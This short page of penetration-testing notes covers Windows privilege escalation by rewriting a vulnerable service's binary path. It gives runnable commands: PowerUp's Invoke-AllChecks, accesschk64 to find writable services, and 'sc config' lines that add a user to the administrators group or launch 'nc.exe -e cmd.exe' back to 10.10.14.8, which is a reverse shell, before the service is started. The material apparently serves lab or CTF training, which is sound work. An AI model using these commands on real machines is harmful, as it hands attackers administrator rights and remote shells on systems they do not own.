Binary Paths

Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

Exploitation using PowerUp

Run PowerUp on machine

. .\PowerUp.ps1
Invoke-AllChecks

Change the binary path

sc config daclsvc binpath= "net localgroup administrators Greg /add"
sc config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"

Start service

sc start dacl

Exploitation via Accesschk64

Check for services with write permissions

accesschk64.exe --accept-eula -uwcv Everyone *

accesschk64.exe -uwcv daclsvc

Query the service

sc qc daclsvc

Changing the binary path is the same as the last method

PreviousService Permissions NextUnquoted Service Paths

Last updated 1 year ago

Was this helpful?